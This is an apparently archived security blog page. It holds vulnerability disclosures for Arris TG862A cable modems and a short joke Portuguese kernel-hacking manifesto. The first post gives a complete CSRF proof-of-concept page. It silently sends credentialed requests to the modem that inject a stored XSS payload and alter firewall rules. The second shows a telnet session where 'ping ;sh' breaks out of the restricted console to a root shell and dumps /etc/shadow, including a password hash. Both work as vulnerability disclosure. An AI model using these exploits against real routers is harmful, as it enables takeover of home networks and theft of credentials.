m0nad's Blog

Just another WordPress.com site

Archive for the ‘Uncategorized’ Category

Persistent XSS and CSRF in TG862A Arris Modem

leave a comment »

Continue with the bugs founded by me on the Arris Modem Series, the TG862A(TS0705125D_031115_MODEL_862_GW) Arris Modem have some obvious persistent XSS and CSRF bugs , in the ‘Firewall’ area.

In the  Firewall->Virtual Servers section
firewall-area

We can add a new ‘Virtual Server’
add-virtual-serv

And put the malicious Javascript code on the “Description” field
add-virtual-server-xss

After click on the button for add a new virtual server, this make the requests to create a new virtual server and when the “virtual server” page with malicious Javascript is called, shows the alert pop-up
xss-popup

The application don’t have any kind of protection to prevent CSRF attacks and the code used for PoC is below. 😉

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpGet?oids=1.3.6.1.4.1.4115.1.20.1.1.2.2.1.5.12;&_n=26020&_=1448050502692", true);
        xhr.setRequestHeader("Accept", "text/plain, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <script>
      function submitRequest2()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpGet?oids=1.3.6.1.4.1.4115.1.20.1.1.2.2.1.3.12;&_n=26020&_=1448050509837", true);
        xhr.setRequestHeader("Accept", "text/plain, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest2();
    </script>
    <script>

      function submitRequest3()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.11.1=5;2;&_n=26020&_=1448050512017", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest3();
    </script>
    <script>
      function submitRequest4()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.2.1=test%3Cscript%3Ealert(1)%3C%2Fscript%3E;4;&_n=26020&_=1448050516100", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest4();
    </script>
    <script>
      function submitRequest5()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.3.1=666;66;&_n=26020&_=1448050518619", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest5();
    </script>
    <script>
      function submitRequest6()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.4.1=666;66;&_n=26020&_=1448050530861", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest6();
    </script>
    <script>
      function submitRequest7()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.5.1=1;2;&_n=26020&_=1448050533971", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest7();
    </script>
    <script>
      function submitRequest8()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.6.1=1;2;&_n=26020&_=1448050539233", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest8();
    </script>
    <script>
      function submitRequest9()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.7.1=%24C0A8000A;4;&_n=26020&_=1448050545672", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest9();
    </script>
    <script>
      function submitRequest10()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.9.1=666;66;&_n=26020&_=1448050550616", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest10();
    </script>
    <script>
      function submitRequest11()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.10.1=666;66;&_n=26020&_=1448050556630", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest11();
    </script>
    <script>
      function submitRequest12()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.11.1=1;2;&_n=26020&_=1448050559849", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest12();
    </script>
    <script>
      function submitRequest13()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.9.0=1;2;&_n=26020&_=1448050563269", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest13();
    </script>
  </body>
</html>

Regards.

update: Vulnerabilities still in TS0705125E_111615_MODEL_862_GW

Anúncios

Written by m0nad

novembro 20, 2015 at 9:29 pm

Publicado em Uncategorized

Command injection in Arris modens

with 2 comments

Inspired by the publication of Bernardo Rodrigues for NullByte Conference in his blog(http://w00tsec.blogspot.com.br/2015/11/arris-cable-modem-has-backdoor-in.html) of some command injections (backdoors?) in the restricted shell of Arris modems, i decided to publish another injection of commands that he may not have noticed, in the ‘ping’ feature.

Arris TG862A Command Injection
--
Arris TG862A has a console(ARRIS Console) that within the "System"
context, have a command injection in the ping feature. The password for
the ARRIS Console is the "password of the day".

Version affected
--
Hardware Model:         TG862A
Firmware Name:          TS0705125_062314_MODEL_862_GW
Firmware Revision:      7.5.125
Base Version:           2.0.5.38

PoC
--
```
$ telnet 192.168.100.1
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.



                           `!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM::~
                               ``!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM!:~` ~   
                                    !MMMMMMMMMMMMMMMMMMMMMMM!:`     :~~     
                                     :MMMMMMMMMMMMMMMM!~        :~~~~       
                                   .:MMMMMMMMMM!:~           ~~~~~~         
                              ..:MMMMMMM!:~`             :~~~~~~~           
                         .:MMMMMM:~`                ::~~~~~~~~~             
                    .:MMMMM:~                    .!!!!!!: ~~~~              
              ..:MMM:~`                         .!!!!`      ~               
        ..:MM:~`                                !!`                         
   .:M:~` 


        AA              RRRRRRR          RRRRRRR          III         SSSSS  
       AAAA             RRRRRRRRR        RRRRRRRRR        III       SSSSSSSSS
      AAAAAA            RRR    RRR       RRR    RRR       III      SSS    SS 
     AAA  AAA           RRR   RRRR       RRR   RRRR       III       SSSS     
    AAA    AAA          RRRRRRRRR        RRRRRRRRR        III         SSSSSS 
   AAAAAAAAAAAA         RRR  RRR         RRR  RRR         III            SSSS
  AAA        AAA        RRR   RRR        RRR   RRR        III       SS    SSS
 AA            AA       RRR    RRR       RRR    RRR       III      SSSSSSSSS 
A                A      RRR       R      RRR       R      III        SSSSS   


          ARRIS Enterprises, Inc. 2014 All rights reserved




Enter password> 

Spawning ARRIS Console

Firmware Revision:      7.5.125
[  1] Console> system
[  2] System> ping ;sh
ping -I wan0 ;sh 
BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) multi-call binary

Usage: ping [OPTIONS] HOST



BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /etc/shadow
root:$1$xQWhDWOr$FYNAc2DuT2Q45OY7s2R43/:10063:0:99999:7:::
# 
```

Credits
--
Victor N. Ramos Mello <victornrm () gmail com>

obs: This bug still active in TS0705125D_031115_MODEL_862_GW firmware.

Written by m0nad

novembro 20, 2015 at 6:13 pm

Publicado em Uncategorized

Extreme Kernel Horser MANIFESTO

with one comment

1 – Extreme Kernel Horser sempre usa a ultima versão do kernel, unstable!
2 – Extreme Kernel Horser não faz backup do kernel antigo.
3 – Extreme Kernel Horser testa sempre na própria maquina segundo a regra 1 e 2.
4 – Extreme Kernel Horser recompila kernel , e testa segundo a regra 1, 2 e 3.
5 – Extreme Kernel Horser programa modulo de kernel, e testa segundo a regra 1, 2 e 3.
6 – Extreme Kernel Horser modifica o kernel, e testa segundo a regra 1, 2, 3 e 4.
7 – Extreme Kernel Horser não é metodologia de desenvolvimento, é estilo de vida.
Happy Kernel Hacking 🙂

Written by m0nad

abril 5, 2011 at 1:35 pm

Publicado em Uncategorized